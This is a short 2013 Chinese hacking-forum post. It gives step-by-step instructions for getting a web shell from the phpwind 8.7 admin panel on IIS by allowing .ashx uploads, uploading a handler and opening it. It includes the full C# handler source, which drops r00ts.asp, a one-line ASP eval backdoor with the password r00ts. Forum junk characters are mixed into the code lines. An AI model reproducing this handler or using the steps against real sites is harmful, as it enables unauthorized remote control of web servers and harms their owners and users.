找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2103|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
) |" L; K2 J+ U6 `% G . H8 G! @& c3 _4 K* `" S6 Z
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx- Y/ V  [0 ^8 f8 P( W! r: R% ]

  f4 U8 n4 ]3 j/ n' R% c$ }" x发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
3 ?# h* R) ^7 M: @1 n
7 k. S( L; X% m% q$ e( Q然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
) P. V9 h# {3 j& _7 q
" f+ w. l; J' C打开之后空白 会在目录底下生成r00ts.asp 密码r00ts& P$ ^$ y) N1 Z' Y" T
# ^3 j" h0 K& G) B& y! l; Z
下面是代码:
3 `$ |+ z% N. N4 Y3 d" @. i
3 U7 |! e3 A- @% @<%@ WebHandler Language="C#"Class="Handler" %>
/ }3 `1 y- ?  I3 |. V/ O$ Xusing System;
) _# L3 @* r1 Rusing System.Web;( {0 u7 D6 {, h* m. L
using System.IO;9 x* Y2 b" }+ z( l7 x# m
public class Handler : IHttpHandler {
$ g/ o& J. r/ _+ x/ |public void ProcessRequest (HttpContext context) {
: M! a( T0 ]# B! c: L1 v3 H* ucontext.Response.ContentType = "text/plain";3 t0 x9 l$ x' ]6 S9 j
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
8 f% D5 ?% y7 P9 ffile1.Write("<%eval request(\"r00ts\")%>");- z# y: r# n) N4 J- {2 i
file1.Flush();
3 v  K2 ]$ {+ Efile1.Close();) _( Q6 W& E, U, S
}9 w3 u8 P- r: Z7 ^
public bool IsReusable {" T9 J$ y( |  U) H: V- B. h7 a
get {  ?, [& ^$ A! u! a3 G9 o3 t
return false;& D8 P; l( h( r5 A0 q3 \- r$ E
}
5 A! C. h( X$ ]7 n5 K' y}9 C2 K1 U( f: X! ~
}
+ V, M5 l) }  Y5 C
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表